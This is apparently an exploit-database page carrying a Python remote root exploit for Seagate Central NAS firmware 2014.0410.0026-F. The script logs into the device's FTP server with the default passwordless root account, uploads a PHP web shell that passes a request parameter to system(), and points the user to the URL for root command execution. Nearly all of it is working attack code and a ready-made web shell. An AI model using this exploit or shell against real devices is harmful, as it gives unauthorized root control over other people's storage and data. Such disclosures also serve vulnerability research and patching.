Seagate Central 2014.0410.0026-F Remote Root Exploit



EKU-ID: 4882 CVE: OSVDB-ID:
Author: Jeremy Brown Published: 2015-06-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#
 
import sys
from ftplib import FTP
 
port = 21
 
php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
    $cmd = ($_REQUEST["cmd"]);
    echo "<pre>$cmd</pre>";
    system($cmd);
}
?>
"""
 
php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"
 
def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host>" % sys.argv[0])
        return
 
    host = sys.argv[1]
 
    try:
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)
 
    except Exception as error:
        print("Error: %s" % error);
        return
 
    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()
    
    except Exception as error:
        print("Error: %s" % error);
        return
 
    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
 
    return
 
if __name__ == "__main__":
    main()